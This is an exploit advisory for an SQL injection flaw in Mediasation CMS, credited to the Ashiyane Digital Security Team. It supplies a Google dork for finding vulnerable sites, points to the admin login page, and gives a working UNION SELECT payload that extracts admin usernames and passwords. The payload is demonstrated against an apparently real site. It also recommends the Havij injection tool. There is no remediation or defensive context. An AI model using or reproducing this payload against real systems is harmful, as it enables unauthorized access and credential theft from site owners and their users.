############################################### # Exploit Title : Mediasation CMS SQL Injection Vulnerability # # Exploit Author : Ashiyane Digital Security Team # # Home : www.Ashiyane.org # # Security Risk : Medium - SQL Injection # # Vendor Page : www.mediasation.com # # Google Dork :" CMS by Mediasation" &"id=" # ################################################# # vul location: Http://site/*.php?id=[SQLi] # # Admin Page : Http://site/login.php # # DEMO: # ------------------------------------------------------------------------------------ # | www.coveXtdove.com/facility-details.php?id=31 | # | www.coveXove.com/facility-details.php?id=-31%27%20UNION%20SELECT%201,group_concat%28username,0x3a,0x3a,password%29, # | 3,4,5,6,7,8,9,10,11,12,13,14,15,16,17%20from%20admin_users--+ # ------------------------------------------------------------------------------------ # # [ for inject use Havij OR inject manually ] # # Spacial TnX : Reza-S4T4n ,C4T , TrojanMan # Alireza666 , milvar , Remove , B4b4K KH4TaR , # PrinceofHacking , sil3nt ,... ################################################# # Greetz to: My Lord ALLAH ################################################# # # bY T3rm!nat0r5 # #################